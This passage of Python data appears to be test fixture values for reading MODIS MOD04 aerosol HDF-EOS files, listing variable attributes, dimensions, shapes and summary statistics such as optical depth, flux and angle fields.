'Reflected_Flux_Land_And_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Reflected_Flux_Land_And_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized reflected flux at 0.55 micron'},
'Optical_Depth_Ratio_Small_Land_And_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Ratio_Small_Land_And_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Ratio of small mode optical depth at 0.55 micron'},
'Optical_Depth_Land_And_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Land_And_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at 0.55 micron for both ocean (best) and land (corrected)'},
'Scattering_Angle_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Scattering_Angle', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 18000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.009999999776482582]), 'units': 'Degrees', 'long_name': 'Scattering Angle'},
'Cloud_Mask_QA_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Cloud_Mask_QA', '_FillValue': np.array([0], dtype=np.int8), 'valid_range': np.array([ 0, -1], dtype=np.int8), 'Geolocation_Pointer': 'Internal geolocation arrays', 'description': '\n\nCloud_mask_QA flags: \n \n \nQA Flag Name Number of Bit Value Description \n Bits \n--------------------------------------------------------------\nCloud Mask 1 0 Undetermined \n 1 Determined \n \nCloud Mask 2 0 0-25% Cloudy pixels \nQuality Flag 1 25-50% cloudy pixels\n 2 50-75% cloudy pixels\n 3 75-100%cloudy pixels\n \nDay/Night 1 0 Night \nflag 1 Day \n \nSun glint 1 0 Yes \nflag 1 No \n \nSnow/Ice flag 1 0 Yes \n 1 No \n \nLand/Water 2 0 Water (ocean) \nflag 1 Coastal \n 2 Desert \n 3 Land \n---------------------- 1 byte total --------------------------', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'MODIS Input', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Cloud Mask info on 10x10 km resolution'},
'Sensor_Azimuth_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Sensor_Azimuth', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-18000, 18000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'MODIS Input', 'add_offset': np.array([0.]), 'scale_factor': np.array([.009999999776482582]), 'units': 'Degrees', 'long_name': 'Sensor_Azimuth Angle, Cell to Sun'},
'Sensor_Zenith_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Sensor_Zenith', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 18000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'MODIS Input', 'add_offset': np.array([0.]), 'scale_factor': np.array([.009999999776482582]), 'units': 'Degrees', 'long_name': 'Sensor_Zenith Angle, Cell to Sun'},
'Solar_Azimuth_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Solar_Azimuth', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-18000, 18000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'MODIS Input', 'add_offset': np.array([0.]), 'scale_factor': np.array([.009999999776482582]), 'units': 'Degrees', 'long_name': 'Solar_Azimuth Angle, Cell to Sun'},
'Solar_Zenith_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Solar_Zenith', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 18000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'MODIS Input', 'add_offset': np.array([0.]), 'scale_factor': np.array([.009999999776482582]), 'units': 'Degrees', 'long_name': 'Solar Zenith Angle, Cell to Sun'},
'Scan_Start_Time_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Scan_Start_Time', '_FillValue': np.array([-999.]), 'valid_range': np.array([0.00000000e+00, 3.155800064e+09]), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'MODIS Input', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'Seconds since 1993-1-1 00:00:00.0 0', 'long_name': 'TAI Time at Start of Scan replicated across the swath'},
'Latitude_mod04': {'long_name': 'latitude', 'units': 'degrees_north', 'hdfeos_name': 'Latitude', '_FillValue': np.array([-999.], dtype=np.float32)},
'Longitude_mod04': {'long_name': 'longitude', 'units': 'degrees_east', 'hdfeos_name': 'Longitude', '_FillValue': np.array([-999.], dtype=np.float32)}}
var_coordinates = {'MODIS_Band_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'MODIS_Band_Land_mod04': ['MODIS_Band_Land_mod04'], 'Solution_Index_mod04': ['Solution_Index_mod04'], 'Solution_Ocean_mod04': ['Solution_Ocean_mod04'], 'Solution_3_Land_mod04': ['Solution_3_Land_mod04'], 'Solution_2_Land_mod04': ['Solution_2_Land_mod04'], 'Solution_1_Land_mod04': ['Solution_1_Land_mod04'], 'Quality_Assurance_Ocean_mod04': [], 'STD_Reflectance_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Mean_Reflectance_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Number_Pixels_Used_Ocean_mod04': [], 'Cloud_Fraction_Ocean_mod04': [], 'Optical_Depth_by_models_ocean_mod04': ['Solution_Index_mod04'], 'Optical_Depth_Ratio_Small_Ocean_0_86micron_mod04': ['Solution_Ocean_mod04'], 'Least_Squares_Error_Ocean_mod04': ['Solution_Ocean_mod04'], 'Transmitted_Flux_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Transmitted_Flux_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Reflected_Flux_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Reflected_Flux_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Angstrom_Exponent_2_Ocean_mod04': ['Solution_Ocean_mod04'], 'Angstrom_Exponent_1_Ocean_mod04': ['Solution_Ocean_mod04'], 'Backscattering_Ratio_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Backscattering_Ratio_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Asymmetry_Factor_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Asymmetry_Factor_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Cloud_Condensation_Nuclei_Ocean_mod04': ['Solution_Ocean_mod04'], 'Effective_Radius_Ocean_mod04': ['Solution_Ocean_mod04'], 'Mass_Concentration_Ocean_mod04': ['Solution_Ocean_mod04'], 'Optical_Depth_Large_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Optical_Depth_Large_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Optical_Depth_Small_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Optical_Depth_Small_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Effective_Optical_Depth_Average_Ocean_mod04': 
['MODIS_Band_Ocean_mod04'], 'Effective_Optical_Depth_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Solution_Index_Ocean_Large_mod04': ['Solution_Ocean_mod04'], 'Solution_Index_Ocean_Small_mod04': ['Solution_Ocean_mod04'], 'Quality_Assurance_Crit_Ref_Land_mod04': [], 'Quality_Assurance_Land_mod04': [], 'STD_Reflectance_Land_mod04': ['MODIS_Band_Land_mod04'], 'Mean_Reflectance_Land_mod04': ['MODIS_Band_Land_mod04'], 'Number_Pixels_Percentile_Land_mod04': ['Solution_1_Land_mod04'], 'Optical_Depth_Ratio_Small_Land_mod04': [], 'Cloud_Fraction_Land_mod04': [], 'Transmitted_Flux_Land_mod04': ['Solution_1_Land_mod04'], 'Reflected_Flux_Land_mod04': ['Solution_2_Land_mod04'], 'Angstrom_Exponent_Land_mod04': [], 'Mass_Concentration_Land_mod04': [], 'Estimated_Uncertainty_Land_mod04': ['Solution_1_Land_mod04'], 'Corrected_Optical_Depth_Land_mod04': ['Solution_2_Land_mod04'], 'Continental_Optical_Depth_Land_mod04': ['Solution_1_Land_mod04'], 'Aerosol_Type_Land_mod04': [], 'QualityWeight_Critical_Reflectance_Land_mod04': ['Solution_1_Land_mod04'], 'QualityWeight_Path_Radiance_Land_mod04': ['Solution_1_Land_mod04'], 'Error_Critical_Reflectance_Land_mod04': ['Solution_1_Land_mod04'], 'Critical_Reflectance_Land_mod04': ['Solution_1_Land_mod04'], 'Error_Path_Radiance_Land_mod04': ['Solution_1_Land_mod04'], 'Path_Radiance_Land_mod04': ['Solution_1_Land_mod04'], 'Standard_Deviation_Reflectance_Land_All_mod04': ['Solution_3_Land_mod04'], 'Mean_Reflectance_Land_All_mod04': ['Solution_3_Land_mod04'], 'Reflected_Flux_Land_And_Ocean_mod04': [], 'Optical_Depth_Ratio_Small_Land_And_Ocean_mod04': [], 'Optical_Depth_Land_And_Ocean_mod04': [], 'Scattering_Angle_mod04': [], 'Cloud_Mask_QA_mod04': [], 'Sensor_Azimuth_mod04': [], 'Sensor_Zenith_mod04': [], 'Solar_Azimuth_mod04': [], 'Solar_Zenith_mod04': [], 'Scan_Start_Time_mod04': [], 'Latitude_mod04': [], 'Longitude_mod04': []}
var_dimensions = {'MODIS_Band_Ocean_mod04': ('MODIS_Band_Ocean_mod04',), 'MODIS_Band_Land_mod04': ('MODIS_Band_Land_mod04',), 'Solution_Index_mod04': ('Solution_Index_mod04',), 'Solution_Ocean_mod04': ('Solution_Ocean_mod04',), 'Solution_3_Land_mod04': ('Solution_3_Land_mod04',), 'Solution_2_Land_mod04': ('Solution_2_Land_mod04',), 'Solution_1_Land_mod04': ('Solution_1_Land_mod04',), 'Quality_Assurance_Ocean_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04', 'QA_Byte_Ocean_mod04'), 'STD_Reflectance_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Mean_Reflectance_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Number_Pixels_Used_Ocean_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Cloud_Fraction_Ocean_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_by_models_ocean_mod04': ('Solution_Index_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Ratio_Small_Ocean_0_86micron_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Least_Squares_Error_Ocean_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Transmitted_Flux_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Transmitted_Flux_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Reflected_Flux_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Reflected_Flux_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Angstrom_Exponent_2_Ocean_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Angstrom_Exponent_1_Ocean_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 
'Backscattering_Ratio_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Backscattering_Ratio_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Asymmetry_Factor_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Asymmetry_Factor_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Cloud_Condensation_Nuclei_Ocean_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Effective_Radius_Ocean_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Mass_Concentration_Ocean_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Large_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Large_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Small_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Small_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Effective_Optical_Depth_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Effective_Optical_Depth_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Solution_Index_Ocean_Large_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Solution_Index_Ocean_Small_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Quality_Assurance_Crit_Ref_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04', 'QA_Byte_Land_mod04'), 'Quality_Assurance_Land_mod04': ('Cell_Along_Swath_mod04', 
'Cell_Across_Swath_mod04', 'QA_Byte_Land_mod04'), 'STD_Reflectance_Land_mod04': ('MODIS_Band_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Mean_Reflectance_Land_mod04': ('MODIS_Band_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Number_Pixels_Percentile_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Ratio_Small_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Cloud_Fraction_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Transmitted_Flux_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Reflected_Flux_Land_mod04': ('Solution_2_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Angstrom_Exponent_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Mass_Concentration_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Estimated_Uncertainty_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Corrected_Optical_Depth_Land_mod04': ('Solution_2_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Continental_Optical_Depth_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Aerosol_Type_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'QualityWeight_Critical_Reflectance_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'QualityWeight_Path_Radiance_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Error_Critical_Reflectance_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Critical_Reflectance_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Error_Path_Radiance_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 
'Cell_Across_Swath_mod04'), 'Path_Radiance_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Standard_Deviation_Reflectance_Land_All_mod04': ('Solution_3_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Mean_Reflectance_Land_All_mod04': ('Solution_3_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Reflected_Flux_Land_And_Ocean_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Ratio_Small_Land_And_Ocean_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Land_And_Ocean_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Scattering_Angle_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Cloud_Mask_QA_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Sensor_Azimuth_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Sensor_Zenith_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Solar_Azimuth_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Solar_Zenith_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Scan_Start_Time_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Latitude_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Longitude_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04')}
var_shapes = {'MODIS_Band_Ocean_mod04': (7,), 'MODIS_Band_Land_mod04': (5,), 'Solution_Index_mod04': (9,), 'Solution_Ocean_mod04': (2,), 'Solution_3_Land_mod04': (3,), 'Solution_2_Land_mod04': (3,), 'Solution_1_Land_mod04': (2,), 'Quality_Assurance_Ocean_mod04': (203, 135, 5), 'STD_Reflectance_Ocean_mod04': (7, 203, 135), 'Mean_Reflectance_Ocean_mod04': (7, 203, 135), 'Number_Pixels_Used_Ocean_mod04': (203, 135), 'Cloud_Fraction_Ocean_mod04': (203, 135), 'Optical_Depth_by_models_ocean_mod04': (9, 203, 135), 'Optical_Depth_Ratio_Small_Ocean_0_86micron_mod04': (2, 203, 135), 'Least_Squares_Error_Ocean_mod04': (2, 203, 135), 'Transmitted_Flux_Average_Ocean_mod04': (7, 203, 135), 'Transmitted_Flux_Best_Ocean_mod04': (7, 203, 135), 'Reflected_Flux_Average_Ocean_mod04': (7, 203, 135), 'Reflected_Flux_Best_Ocean_mod04': (7, 203, 135), 'Angstrom_Exponent_2_Ocean_mod04': (2, 203, 135), 'Angstrom_Exponent_1_Ocean_mod04': (2, 203, 135), 'Backscattering_Ratio_Average_Ocean_mod04': (7, 203, 135), 'Backscattering_Ratio_Best_Ocean_mod04': (7, 203, 135), 'Asymmetry_Factor_Average_Ocean_mod04': (7, 203, 135), 'Asymmetry_Factor_Best_Ocean_mod04': (7, 203, 135), 'Cloud_Condensation_Nuclei_Ocean_mod04': (2, 203, 135), 'Effective_Radius_Ocean_mod04': (2, 203, 135), 'Mass_Concentration_Ocean_mod04': (2, 203, 135), 'Optical_Depth_Large_Average_Ocean_mod04': (7, 203, 135), 'Optical_Depth_Large_Best_Ocean_mod04': (7, 203, 135), 'Optical_Depth_Small_Average_Ocean_mod04': (7, 203, 135), 'Optical_Depth_Small_Best_Ocean_mod04': (7, 203, 135), 'Effective_Optical_Depth_Average_Ocean_mod04': (7, 203, 135), 'Effective_Optical_Depth_Best_Ocean_mod04': (7, 203, 135), 'Solution_Index_Ocean_Large_mod04': (2, 203, 135), 'Solution_Index_Ocean_Small_mod04': (2, 203, 135), 'Quality_Assurance_Crit_Ref_Land_mod04': (203, 135, 5), 'Quality_Assurance_Land_mod04': (203, 135, 5), 'STD_Reflectance_Land_mod04': (5, 203, 135), 'Mean_Reflectance_Land_mod04': (5, 203, 135), 'Number_Pixels_Percentile_Land_mod04': (2, 
203, 135), 'Optical_Depth_Ratio_Small_Land_mod04': (203, 135), 'Cloud_Fraction_Land_mod04': (203, 135), 'Transmitted_Flux_Land_mod04': (2, 203, 135), 'Reflected_Flux_Land_mod04': (3, 203, 135), 'Angstrom_Exponent_Land_mod04': (203, 135), 'Mass_Concentration_Land_mod04': (203, 135), 'Estimated_Uncertainty_Land_mod04': (2, 203, 135), 'Corrected_Optical_Depth_Land_mod04': (3, 203, 135), 'Continental_Optical_Depth_Land_mod04': (2, 203, 135), 'Aerosol_Type_Land_mod04': (203, 135), 'QualityWeight_Critical_Reflectance_Land_mod04': (2, 203, 135), 'QualityWeight_Path_Radiance_Land_mod04': (2, 203, 135), 'Error_Critical_Reflectance_Land_mod04': (2, 203, 135), 'Critical_Reflectance_Land_mod04': (2, 203, 135), 'Error_Path_Radiance_Land_mod04': (2, 203, 135), 'Path_Radiance_Land_mod04': (2, 203, 135), 'Standard_Deviation_Reflectance_Land_All_mod04': (3, 203, 135), 'Mean_Reflectance_Land_All_mod04': (3, 203, 135), 'Reflected_Flux_Land_And_Ocean_mod04': (203, 135), 'Optical_Depth_Ratio_Small_Land_And_Ocean_mod04': (203, 135), 'Optical_Depth_Land_And_Ocean_mod04': (203, 135), 'Scattering_Angle_mod04': (203, 135), 'Cloud_Mask_QA_mod04': (203, 135), 'Sensor_Azimuth_mod04': (203, 135), 'Sensor_Zenith_mod04': (203, 135), 'Solar_Azimuth_mod04': (203, 135), 'Solar_Zenith_mod04': (203, 135), 'Scan_Start_Time_mod04': (203, 135), 'Latitude_mod04': (203, 135), 'Longitude_mod04': (203, 135)}
var_values = {'Solar_Zenith_mod04': (np.int16(6133), np.int16(8605), np.float64(7363.28049626), 0), 'Solution_Ocean_mod04': (np.int16(1), np.int16(2), np.float64(1.5), 0), 'Optical_Depth_by_models_ocean_mod04': (np.int16(0), np.int16(72), np.float64(7.95495495495), 246312), 'Optical_Depth_Ratio_Small_Land_And_Ocean_mod04': (np.int16(366), np.int16(756), np.float64(589.216216216), 27368), 'Mass_Concentration_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 27405), 'STD_Reflectance_Ocean_mod04': (np.int16(3), np.int16(64), np.float64(19.3822393822), 191576), 'Angstrom_Exponent_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 27405), 'Estimated_Uncertainty_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 54810), 'Transmitted_Flux_Average_Ocean_mod04': (np.int16(788), np.int16(992), np.float64(927.548262548), 191576), 'Solution_Index_Ocean_Large_mod04': (np.int16(5), np.int16(8), np.float64(6.10810810811), 54736), 'Transmitted_Flux_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 54810), 'Standard_Deviation_Reflectance_Land_All_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 80832), 'MODIS_Band_Ocean_mod04': (np.int16(470), np.int16(2130), np.float64(1079.85714286), 0), 'Longitude_mod04': (np.float32(-179.982162476), np.float32(179.997695923), np.float32(-3.1039249897), 0), 'Reflected_Flux_Best_Ocean_mod04': (np.int16(61), np.int16(278), np.float64(135.181467181), 191576), 'Optical_Depth_Large_Best_Ocean_mod04': (np.int16(7), np.int16(78), np.float64(32.9305019305), 191576), 'Quality_Assurance_Land_mod04': (np.int8(-16), np.int8(56), np.float64(13.6657539977), 84432), 'Angstrom_Exponent_1_Ocean_mod04': (np.int16(322), np.int16(1520), np.float64(972.986486486), 54736), 'Corrected_Optical_Depth_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 82215), 'Asymmetry_Factor_Best_Ocean_mod04': (np.int16(558), np.int16(752), np.float64(668.733590734), 191576), 'Optical_Depth_Land_And_Ocean_mod04': (np.int16(30), np.int16(126), 
np.float64(71.5135135135), 27368), 'Backscattering_Ratio_Best_Ocean_mod04': (np.int16(185), np.int16(271), np.float64(223.111969112), 191576), 'Error_Critical_Reflectance_Land_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 53888), 'Cloud_Fraction_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 27405), 'Scan_Start_Time_mod04': (np.float64(258076805.828041), np.float64(258077104.203138), np.float64(258076955.01559186), 0), 'QualityWeight_Critical_Reflectance_Land_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 53888), 'Number_Pixels_Used_Ocean_mod04': (np.int16(12), np.int16(166), np.float64(55.1891891892), 27368), 'Solution_Index_Ocean_Small_mod04': (np.int16(1), np.int16(4), np.float64(1.45945945946), 54736), 'Least_Squares_Error_Ocean_mod04': (np.int16(25), np.int16(119), np.float64(53.2027027027), 54736), 'Mean_Reflectance_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 137025), 'MODIS_Band_Land_mod04': (np.int16(470), np.int16(3750), np.float64(1574.8), 0), 'Optical_Depth_Small_Average_Ocean_mod04': (np.int16(0), np.int16(110), np.float64(22.0463320463), 191576), 'Effective_Optical_Depth_Average_Ocean_mod04': (np.int16(9), np.int16(163), np.float64(53.4633204633), 191576), 'Reflected_Flux_Average_Ocean_mod04': (np.int16(61), np.int16(277), np.float64(135.131274131), 191576), 'STD_Reflectance_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 137025), 'Aerosol_Type_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 27405), 'Cloud_Mask_QA_mod04': (np.int8(-33), np.int8(127), np.float64(70.4317825214), 0), 'Angstrom_Exponent_2_Ocean_mod04': (np.int16(140), np.int16(1150), np.float64(469.743243243), 54736), 'Mean_Reflectance_Land_All_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 80832), 'Reflected_Flux_Land_And_Ocean_mod04': (np.int16(160), np.int16(203), np.float64(181.810810811), 27368), 'Quality_Assurance_Crit_Ref_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 137025), 'Cloud_Condensation_Nuclei_Ocean_mod04': 
